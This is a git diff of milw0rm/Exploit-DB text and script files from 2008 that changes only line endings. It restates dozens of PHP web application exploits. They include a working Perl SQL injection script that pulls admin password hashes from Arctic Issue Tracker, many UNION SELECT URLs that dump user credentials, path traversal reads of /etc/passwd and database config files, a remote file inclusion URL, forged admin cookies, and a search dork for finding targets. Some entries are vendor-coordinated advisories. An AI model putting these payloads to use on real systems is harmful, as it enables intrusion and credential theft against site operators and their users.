next release of the package." - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. 
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. - -# milw0rm.com [2008-07-21] +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-31 + + +Application: Interact E-Learning System +Versions Affected: 2.4.1 +Vendor URL: http://sourceforge.net/projects/cce-interact +Bug: Local File Include +Exploits: YES +Reported: 03.07.2008 +Vendor response: 04.07.2008 +Solution: YES +Date of Public Advisory: 21.07.2008 +Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +Interact E-Learning System system has local file include vulnerability in script help/help.php + +Vulnerable GET parameters "module", "file". + +Code +**** +################################################# + +$module = isset($_GET['module']) ? $_GET['module']:''; +$file = isset($_GET['file']) ? $_GET['file']:''; + +... + +$hpath=$CONFIG['BASE_PATH'].'/language/'.$_SESSION['language'].'/help/'.$module.'/'.$file; +if (is_file($hpath)){ + require_once($hpath); +} else { + require_once($CONFIG['BASE_PATH'].'/language/default/help/'.$module.'/'.$file); +} + +################################################# + +Example: + +http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00 +http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd + + + +Solution +******** + +This file is no longer required by the system. Remove it from installation. + +Vendor response: + +"I have posted an alert to users to remove this from their installations asap and will get it removed from the next release of the package." 
+ + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. + +# milw0rm.com [2008-07-21] diff --git a/platforms/php/webapps/6112.txt b/platforms/php/webapps/6112.txt index baa4070d8..aeedb40ce 100755 --- a/platforms/php/webapps/6112.txt +++ b/platforms/php/webapps/6112.txt 
@@ -1,28 +1,28 @@ -################################################################################################## - EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability |, .-. .-. ,| - Found by : Ghost Hacker [ R-H TeaM ] | )(_o/ \o_)( | - My Site web : Real-hack.Net |/ /\ \| -################################################################################################## -[~] Found by : Ghost Hacker [ R-H TeaM ] -[~] Home page : www.Real-hack.net -[~] Email : Ghost-r00t@Hotmail.com -[~] Name Script : EZWebAlbum -[~] Download Script : http://sourceforge.net/projects/ezwebalbum -###################################### [ Viva IslaM & KSA ] ###################################### -[~] Error (download.php) : -readfile($dlfilename); - -[~] Exploit : -http://xxxx/[path]/download.php?dlfilename=EVIL -[~] Example : -http://xxxx/[path]/download.php?dlfilename=index.php -###################################### [ Viva IslaM & KSA ] ###################################### -[~] Greetz : -PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker .. -Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ] -All Members Real Hack And All My Friends .. -################################################################################################## - Found by : Ghost Hacker [ R-H TeaM ] -################################################################################################## - -# milw0rm.com [2008-07-21] +################################################################################################## + EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability |, .-. .-. 
,| + Found by : Ghost Hacker [ R-H TeaM ] | )(_o/ \o_)( | + My Site web : Real-hack.Net |/ /\ \| +################################################################################################## +[~] Found by : Ghost Hacker [ R-H TeaM ] +[~] Home page : www.Real-hack.net +[~] Email : Ghost-r00t@Hotmail.com +[~] Name Script : EZWebAlbum +[~] Download Script : http://sourceforge.net/projects/ezwebalbum +###################################### [ Viva IslaM & KSA ] ###################################### +[~] Error (download.php) : +readfile($dlfilename); + +[~] Exploit : +http://xxxx/[path]/download.php?dlfilename=EVIL +[~] Example : +http://xxxx/[path]/download.php?dlfilename=index.php +###################################### [ Viva IslaM & KSA ] ###################################### +[~] Greetz : +PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker .. +Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ] +All Members Real Hack And All My Friends .. +################################################################################################## + Found by : Ghost Hacker [ R-H TeaM ] +################################################################################################## + +# milw0rm.com [2008-07-21] diff --git a/platforms/php/webapps/6113.pl b/platforms/php/webapps/6113.pl index 8d1ae2747..fd1fb30f3 100755 --- a/platforms/php/webapps/6113.pl +++ b/platforms/php/webapps/6113.pl 
@@ -1,87 +1,87 @@ -#!/usr/bin/perl - -use IO::Socket; - - -print q{ ------------------------------------------------ -Arctic Issue Tracker v2.0.0 exploit by ldma - ~ SubCode ~ -use: arctic.pl [server] [dir] -sample: -$perl arctic.pl localhost /arctic/ ------------------------------------------------ - -}; - -$webpage = $ARGV[0]; -$directory = $ARGV[1]; -print "+-initiating\n"; -print "|--modules..OK!\n"; - sleep 1; -print "|--premodules..OK!\n"; - sleep 1; -print "|--preprocessors..OK!\n"; - sleep 1; -print "+-opening channel.. OK!\n"; - sleep 2; -print "--------------------------------------------\n"; -print "~ configuration complete.. OK!\n"; -print "~ scanning"; -$|=1; -foreach (1..2) { - print "."; - sleep 1; - } -print " OK!\n"; -if (!$webpage) { die "\+ rtfm geek\n"; } - -$wbb_dir = -"http://".$webpage.$directory."index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--"; - -print "~ connecting"; -$|=1; -foreach (1..1) { - print "."; - sleep 1; - } -print " OK!\n"; -$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n"; - -print "~ open exploiting-tree"; -$|=1; -foreach (1..2) { - print "."; - sleep 1; - } -print " OK!\n"; -print $sock "GET $wbb_dir HTTP/1.1\n"; -print $sock "Accept: */*\n"; -print $sock "User-Agent: Hacker\n"; -print $sock "Host: $webpage\n"; -print $sock "Connection: close\n\n"; -print "[+] Target: $webpage\n"; -while ($answer = <$sock>) { -if ($answer =~ /Current Filter: (.*)<\/strong>/) { -print "exploiting in progress"; -$|=1; -foreach (1..3) { - print "..."; - sleep 1; - } - - -print "OK!\n[+] vuln: OK!\n\n\nwell done, ldma!\n\n"; -print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; -print "[+] USER-ID: -1\n"; -print "[+] ID-HASH: $1\n"; -print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; -exit(); -} -} - -close($sock); - -# ldma[2008-07-19] - -# milw0rm.com [2008-07-21] +#!/usr/bin/perl + +use 
IO::Socket; + + +print q{ +----------------------------------------------- +Arctic Issue Tracker v2.0.0 exploit by ldma + ~ SubCode ~ +use: arctic.pl [server] [dir] +sample: +$perl arctic.pl localhost /arctic/ +----------------------------------------------- + +}; + +$webpage = $ARGV[0]; +$directory = $ARGV[1]; +print "+-initiating\n"; +print "|--modules..OK!\n"; + sleep 1; +print "|--premodules..OK!\n"; + sleep 1; +print "|--preprocessors..OK!\n"; + sleep 1; +print "+-opening channel.. OK!\n"; + sleep 2; +print "--------------------------------------------\n"; +print "~ configuration complete.. OK!\n"; +print "~ scanning"; +$|=1; +foreach (1..2) { + print "."; + sleep 1; + } +print " OK!\n"; +if (!$webpage) { die "\+ rtfm geek\n"; } + +$wbb_dir = +"http://".$webpage.$directory."index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--"; + +print "~ connecting"; +$|=1; +foreach (1..1) { + print "."; + sleep 1; + } +print " OK!\n"; +$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n"; + +print "~ open exploiting-tree"; +$|=1; +foreach (1..2) { + print "."; + sleep 1; + } +print " OK!\n"; +print $sock "GET $wbb_dir HTTP/1.1\n"; +print $sock "Accept: */*\n"; +print $sock "User-Agent: Hacker\n"; +print $sock "Host: $webpage\n"; +print $sock "Connection: close\n\n"; +print "[+] Target: $webpage\n"; +while ($answer = <$sock>) { +if ($answer =~ /Current Filter: (.*)<\/strong>/) { +print "exploiting in progress"; +$|=1; +foreach (1..3) { + print "..."; + sleep 1; + } + + +print "OK!\n[+] vuln: OK!\n\n\nwell done, ldma!\n\n"; +print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; +print "[+] USER-ID: -1\n"; +print "[+] ID-HASH: $1\n"; +print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; +exit(); +} +} + +close($sock); + +# ldma[2008-07-19] + +# milw0rm.com [2008-07-21] 
diff --git a/platforms/php/webapps/6114.txt b/platforms/php/webapps/6114.txt
index 018aa652f..742c259ee 100755
--- a/platforms/php/webapps/6114.txt
+++ b/platforms/php/webapps/6114.txt
@@ -1,16 +1,16 @@
-ShopcartDX Remote Sql Injection All Version
-
-By Cr@zy_King / sqL Lov3r'Z Crew Co. 2008
-
-Downlod: http://webscripts.softpedia.com/script/E-Commerce/Shopping-Carts/ShopcartDX-1-1421.html
-
-Sql :
-
-http://localhost/patch/product_detail.php?cid=9&pid=-1 UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16/*
-
-Greatz : aLL My Friend'Z and str0ke
-
-
-========================================From Turkey=============================================
-
-# milw0rm.com [2008-07-21]
+ShopcartDX Remote Sql Injection All Version
+
+By Cr@zy_King / sqL Lov3r'Z Crew Co. 2008
+
+Downlod: http://webscripts.softpedia.com/script/E-Commerce/Shopping-Carts/ShopcartDX-1-1421.html
+
+Sql :
+
+http://localhost/patch/product_detail.php?cid=9&pid=-1 UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16/*
+
+Greatz : aLL My Friend'Z and str0ke
+
+
+========================================From Turkey=============================================
+
+# milw0rm.com [2008-07-21]
diff --git a/platforms/php/webapps/6115.txt b/platforms/php/webapps/6115.txt
index ee8c10238..bbd418211 100755
--- a/platforms/php/webapps/6115.txt
+++ b/platforms/php/webapps/6115.txt
@@ -1,50 +1,50 @@ - ################################################################################### - # # - # ...:::::EZWebAlbum Insecure Cookie Handling Vulnerability ::::.... # - ################################################################################### - -Virangar Security Team - -www.virangar.net -www.virangar.ir - --------- -Discoverd By :virangar security team(Zahra:zh_virangar) - -special tnx :my master hadihadi - -tnx to:MR.nosrati,black.shadowes,MR.hesy - -& all virangar members & all hackerz -------- -DESCRIPTION: -EZWebAlbum, suffers from insecure cookie handling, when a admin login is successfull the script creates -a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt -contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are -logged in as a legit admin. ---- -some code in index.php: - - if ( $HTTP_POST_VARS['enteredadminpassword'] == $adminpassword ) - { - setcookie("photoalbumadmin","1"); - header("Location: index.php"); - } -********************** -now vuln code in constants.inc: -$gotalbumadminrights = False; - -if (isset($photoalbumadmin)) -{ - $gotalbumadminrights = True; -}//SET ADMIN RIGHTS IF COOKIE FOUND ---- -exploit: -javascript:document.cookie = "photoalbumadmin=1; path=/"; ------ -now you can get admin access and manage the cms ;) -[+]Example:add a new page in addpage.php -------- -young iranian h4ck3rz - -# milw0rm.com [2008-07-21] + ################################################################################### + # # + # ...:::::EZWebAlbum Insecure Cookie Handling Vulnerability ::::.... 
# + ################################################################################### + +Virangar Security Team + +www.virangar.net +www.virangar.ir + +-------- +Discoverd By :virangar security team(Zahra:zh_virangar) + +special tnx :my master hadihadi + +tnx to:MR.nosrati,black.shadowes,MR.hesy + +& all virangar members & all hackerz +------- +DESCRIPTION: +EZWebAlbum, suffers from insecure cookie handling, when a admin login is successfull the script creates +a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt +contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are +logged in as a legit admin. +--- +some code in index.php: + + if ( $HTTP_POST_VARS['enteredadminpassword'] == $adminpassword ) + { + setcookie("photoalbumadmin","1"); + header("Location: index.php"); + } +********************** +now vuln code in constants.inc: +$gotalbumadminrights = False; + +if (isset($photoalbumadmin)) +{ + $gotalbumadminrights = True; +}//SET ADMIN RIGHTS IF COOKIE FOUND +--- +exploit: +javascript:document.cookie = "photoalbumadmin=1; path=/"; +----- +now you can get admin access and manage the cms ;) +[+]Example:add a new page in addpage.php +------- +young iranian h4ck3rz + +# milw0rm.com [2008-07-21] diff --git a/platforms/php/webapps/6117.txt b/platforms/php/webapps/6117.txt index a7829fc00..1261bbcb7 100755 --- a/platforms/php/webapps/6117.txt +++ b/platforms/php/webapps/6117.txt 
@@ -1,56 +1,56 @@ - _____ _ _ _____ _____ _____ _____ - / ___| |_| | _ \| _ | _ |_ _| - | (___| _ | [_)_/| (_) | (_) | | | - \_____|_| |_|_| |_||_____|_____| |_| - C. H. R. O. O. T. SECURITY GROUP - - -- ----- --- -- -- ---- --- -- - - http://www.chroot.org - - _ _ _ _____ ____ ____ __ _ - Hacks In Taiwan | |_| | |_ _| __| | \| | - Conference 2008 | _ | | | | | (__| () | | - |_| |_|_| |_| \____|____|_|\__| - http://www.hitcon.org - - -Title =======:: YouTube Blog 0.1 Multiple Remote Vulnerabilities - -Author ======:: unohope [at] chroot [dot] org - -IRC =========:: irc.chroot.org #chroot - -ScriptName ==:: YouTube Blog - -Download ====:: http://nchc.dl.sourceforge.net/sourceforge/youtubeblog/ytb_v0.1.zip - -Mirror ======:: http://www.badongo.com/file/10507193 - -______________________ - -magic_quotes_gpc = Off -safe_mode = Off - -_____ -[SQL] - -http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/* - -_____ -[XSS] - -http://victim/ytb/mensaje.php?m= - -_____ -[RFI] - -http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt - - -and more .. = = - -______ -[NOTE] - -!! This is just for educational purposes, DO NOT use for illegal. !! - -# milw0rm.com [2008-07-22] + _____ _ _ _____ _____ _____ _____ + / ___| |_| | _ \| _ | _ |_ _| + | (___| _ | [_)_/| (_) | (_) | | | + \_____|_| |_|_| |_||_____|_____| |_| + C. H. R. O. O. T. 
SECURITY GROUP + - -- ----- --- -- -- ---- --- -- - + http://www.chroot.org + + _ _ _ _____ ____ ____ __ _ + Hacks In Taiwan | |_| | |_ _| __| | \| | + Conference 2008 | _ | | | | | (__| () | | + |_| |_|_| |_| \____|____|_|\__| + http://www.hitcon.org + + +Title =======:: YouTube Blog 0.1 Multiple Remote Vulnerabilities + +Author ======:: unohope [at] chroot [dot] org + +IRC =========:: irc.chroot.org #chroot + +ScriptName ==:: YouTube Blog + +Download ====:: http://nchc.dl.sourceforge.net/sourceforge/youtubeblog/ytb_v0.1.zip + +Mirror ======:: http://www.badongo.com/file/10507193 + +______________________ + +magic_quotes_gpc = Off +safe_mode = Off + +_____ +[SQL] + +http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/* + +_____ +[XSS] + +http://victim/ytb/mensaje.php?m= + +_____ +[RFI] + +http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt + + +and more .. = = + +______ +[NOTE] + +!! This is just for educational purposes, DO NOT use for illegal. !! + +# milw0rm.com [2008-07-22] diff --git a/platforms/php/webapps/6125.txt b/platforms/php/webapps/6125.txt index e1c4a3b8a..cf187cd9f 100755 --- a/platforms/php/webapps/6125.txt +++ b/platforms/php/webapps/6125.txt 
@@ -1,38 +1,38 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## Atom PhotoBlog ( atomPhotoBlog.php do ) -## -## http://sourceforge.net/projects/atomphotoblog/ -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.Target.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user -## -######################## -######################## - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-24] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## Atom PhotoBlog ( atomPhotoBlog.php do ) +## +## http://sourceforge.net/projects/atomphotoblog/ +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.Target.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user +## +######################## +######################## + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-24] diff --git a/platforms/php/webapps/6126.txt b/platforms/php/webapps/6126.txt index 0f089cb09..279b30448 100755 --- a/platforms/php/webapps/6126.txt +++ b/platforms/php/webapps/6126.txt 
@@ -1,11 +1,11 @@ -Name: [AFD] i-base <= 2.03 -Author: Dyshoo -Vendor: http://www.i-base.net/ -Dork: "inurl:ibase site:de" - -http://[site]/ibase/zubehoer/download.php?filename=[file] - -Database config: -http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php - -# milw0rm.com [2008-07-24] +Name: [AFD] i-base <= 2.03 +Author: Dyshoo +Vendor: http://www.i-base.net/ +Dork: "inurl:ibase site:de" + +http://[site]/ibase/zubehoer/download.php?filename=[file] + +Database config: +http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php + +# milw0rm.com [2008-07-24] diff --git a/platforms/php/webapps/6127.htm b/platforms/php/webapps/6127.htm index d653fe03c..35190255d 100755 --- a/platforms/php/webapps/6127.htm +++ b/platforms/php/webapps/6127.htm @@ -1,21 +1,21 @@ -

    WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD

    -

    SaO

    -

    BiyoSecurityTeam || www.biyosecurity.com

    -Plugin URI: http://giulioganci.netsons.org/downloads-manager -
    -
    - -
    - - - - - - - - -
    Local File
    -
    -
    - -# milw0rm.com [2008-07-24] +

    WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD

    +

    SaO

    +

    BiyoSecurityTeam || www.biyosecurity.com

    +Plugin URI: http://giulioganci.netsons.org/downloads-manager +
    +
    + +
    + + + + + + + + +
    Local File
    +
    +
    + +# milw0rm.com [2008-07-24] diff --git a/platforms/php/webapps/6128.txt b/platforms/php/webapps/6128.txt index 69a206f02..4f1627146 100755 --- a/platforms/php/webapps/6128.txt +++ b/platforms/php/webapps/6128.txt 
@@ -1,36 +1,36 @@ -############################################################### -#################### i love abeer #################### -## -## Remote SQL injection Vulnerability -## -## Live Music Plus v1.1.0 -## -############################################################### -############################################################### -## -## AuTh0r : IRAQI - -## -## -## -## Email : expl0it.zone@googlemail.com -## -## -######################## -######################## -## -## -[[: Exploite :]]- -## -## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/* -## -## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users-- -## -######################## -######################## - -1) Download script : http://www.nersoft.com/ -2) Passwords Md5 - -############################################################################# - -# milw0rm.com [2008-07-24] +############################################################### +#################### i love abeer #################### +## +## Remote SQL injection Vulnerability +## +## Live Music Plus v1.1.0 +## +############################################################### +############################################################### +## +## AuTh0r : IRAQI + +## +## +## +## Email : expl0it.zone@googlemail.com +## +## +######################## +######################## +## +## -[[: Exploite :]]- +## +## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/* +## +## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users-- +## +######################## +######################## + +1) Download script : http://www.nersoft.com/ +2) Passwords Md5 + +############################################################################# + +# milw0rm.com [2008-07-24] 
diff --git a/platforms/php/webapps/6131.txt b/platforms/php/webapps/6131.txt index 4df74732b..d53115017 100755 --- a/platforms/php/webapps/6131.txt +++ b/platforms/php/webapps/6131.txt @@ -1,25 +1,25 @@ -############################################################## - -XMRS Multiple Vulnerabilities (ZeroDay at 25-07-2008) -Author: AzzCoder [azzcoder@hotmail.com] -Product: http://www.xrms.org/ -Product Type: CRM -Thanks: coresecurity.com - -Remote File Inclusion - File: activities/workflow-activities.php - Variable: $include_directory - Required register_globals: Yes - -XSS - Multiple Files - Variable: $msg - Quote limitations: Yes - -Information Gathering - tests/info.php - phpinfo() call - -############################################################## - -# milw0rm.com [2008-07-25] +############################################################## + +XMRS Multiple Vulnerabilities (ZeroDay at 25-07-2008) +Author: AzzCoder [azzcoder@hotmail.com] +Product: http://www.xrms.org/ +Product Type: CRM +Thanks: coresecurity.com + +Remote File Inclusion + File: activities/workflow-activities.php + Variable: $include_directory + Required register_globals: Yes + +XSS + Multiple Files + Variable: $msg + Quote limitations: Yes + +Information Gathering + tests/info.php + phpinfo() call + +############################################################## + +# milw0rm.com [2008-07-25] diff --git a/platforms/php/webapps/6132.txt b/platforms/php/webapps/6132.txt index 633679a65..1960e20d4 100755 --- a/platforms/php/webapps/6132.txt +++ b/platforms/php/webapps/6132.txt 
@@ -1,19 +1,19 @@
-#Camera Life 2.6.2(id) Sql Injection Vulnerability
-
-
-
-#Author: nuclear
-
-
-
-#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip
-
-
-
-#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --
-
-
-
-#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P
-
-# milw0rm.com [2008-07-25]
+#Camera Life 2.6.2(id) Sql Injection Vulnerability
+
+
+
+#Author: nuclear
+
+
+
+#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip
+
+
+
+#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --
+
+
+
+#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P
+
+# milw0rm.com [2008-07-25]
diff --git a/platforms/php/webapps/6133.txt b/platforms/php/webapps/6133.txt
index 837565a8f..3b20871e7 100755
--- a/platforms/php/webapps/6133.txt
+++ b/platforms/php/webapps/6133.txt
@@ -1,38 +1,38 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## FizzMedia 1.51.2 ( comment.php mid ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.Target.com/comment.php?mid=-1'+UNION+SELECT+0,0,0,Concat_Ws(0x3a3a,user,pass)MrSQL,0,0,0,0,0,0,0,0,0+FROM+admin/* -## -######################## -######################## --[[ download ]]- -http://fizzmedia.negativekarma.net/fizzMedia_1.51.2.zip - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-25] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL injection Vulnerability +## +## FizzMedia 1.51.2 ( comment.php mid ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.Target.com/comment.php?mid=-1'+UNION+SELECT+0,0,0,Concat_Ws(0x3a3a,user,pass)MrSQL,0,0,0,0,0,0,0,0,0+FROM+admin/* +## +######################## +######################## +-[[ download ]]- +http://fizzmedia.negativekarma.net/fizzMedia_1.51.2.zip + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-25] diff --git a/platforms/php/webapps/6134.txt b/platforms/php/webapps/6134.txt index 5055b1f3a..27d3567a5 100755 --- a/platforms/php/webapps/6134.txt +++ b/platforms/php/webapps/6134.txt 
@@ -1,33 +1,33 @@ -######################################################################################## -# -# Name : phpTest 0.6.3 (picture.php image_id) Remote SQL Injection Vulnerability -# Author : cOndemned [ Dark-Coders ] -# Dork : sorry, today no dork [; -# Greetz : ZaBeaTy, str0ke, GregStar, Voo|doo, ixos, 0in, suN8Hclf, TBH, Avantura :* -# -######################################################################################## - -Source code of "picture.php" : - - 24. pt_register('GET', 'image_id'); - 25. - 26. if (isset($image_id)) { - 27. $result = $db->query("SELECT filetype, data FROM images WHERE image_id = $image_id"); - 28. - 29. if ($db->num_rows($result)) { - 30. $row = $db->fetch_object($result); - 31. header("Content-type: $row->filetype"); - 32. echo $row->data; - -Description : - - line 24 - $image_id is taken from user using $_GET method - line 27 - There is absolutly no validation of $image_id + We can se amount of columns - 2 - line 31 - header type doesn't matter.... - line 32 - Result of MySQL Query is being printed here. - -Exploit : - - http://[host]/[phpTest]/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/* - -# milw0rm.com [2008-07-25] +######################################################################################## +# +# Name : phpTest 0.6.3 (picture.php image_id) Remote SQL Injection Vulnerability +# Author : cOndemned [ Dark-Coders ] +# Dork : sorry, today no dork [; +# Greetz : ZaBeaTy, str0ke, GregStar, Voo|doo, ixos, 0in, suN8Hclf, TBH, Avantura :* +# +######################################################################################## + +Source code of "picture.php" : + + 24. pt_register('GET', 'image_id'); + 25. + 26. if (isset($image_id)) { + 27. $result = $db->query("SELECT filetype, data FROM images WHERE image_id = $image_id"); + 28. + 29. if ($db->num_rows($result)) { + 30. $row = $db->fetch_object($result); + 31. header("Content-type: $row->filetype"); + 32. 
echo $row->data; + +Description : + + line 24 - $image_id is taken from user using $_GET method + line 27 - There is absolutly no validation of $image_id + We can se amount of columns - 2 + line 31 - header type doesn't matter.... + line 32 - Result of MySQL Query is being printed here. + +Exploit : + + http://[host]/[phpTest]/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/* + +# milw0rm.com [2008-07-25] diff --git a/platforms/php/webapps/6136.txt b/platforms/php/webapps/6136.txt index 22d6b0db7..b8b9d5783 100755 --- a/platforms/php/webapps/6136.txt +++ b/platforms/php/webapps/6136.txt 
@@ -1,67 +1,67 @@ - ################################################################################### - # # - # ...:::::phpwebnews-mysql 0.2 Insecure Cookie Handling Vulnerability ::::.... # - ################################################################################### - -Virangar Security Team - -www.virangar.net -www.virangar.ir - --------- -Discoverd By :virangar security team(hadihadi) - -special tnx :my master hadihadi - -tnx to:MR.nosrati,black.shadowes,MR.hesy - -& all virangar members & all hackerz -------- -DESCRIPTION: -phpwebnews-mysql, suffers from insecure cookie handling, when a admin login is successfull the script creates -a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt -contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are -logged in as a legit admin. ---- -vuln code in /news_manajemen/index.php: //admin area index page -line 6-11: -include('x_inc.php'); - -$a1 = $_COOKIE['a1']; -$a2 = $_COOKIE['a2']; - -if (password_valid($a1,$a2,'')) // a function in x-inc.php -********************** -now vuln code in x-inc.php: -lin 22-39: //password_valid function codes - -function password_valid($pemakai, $password, $ea) -{ - -if ( empty($pemakai)||empty($password) ) - return FALSE; - - // koneksi database - $conn = db_connect(); - if (!$conn) - { - return FALSE; - } - -if (empty($ea)) -{ - $result = mysql_query("select * from user - where user='$pemakai' - and passwd='$password'"); -******************************************************* -we can do nice and funny job :D -sql injcetion white cookie values ;) ---- -exploit: -javascript:document.cookie = "a1=admin ' or 1=1/*; path=/;"; document.cookie = "a2=[what ever]; path=/;"; ------ -now you can get admin access and manage the cms ;) -------- -young iranian h4ck3rz - -# milw0rm.com [2008-07-26] + ################################################################################### + # # + 
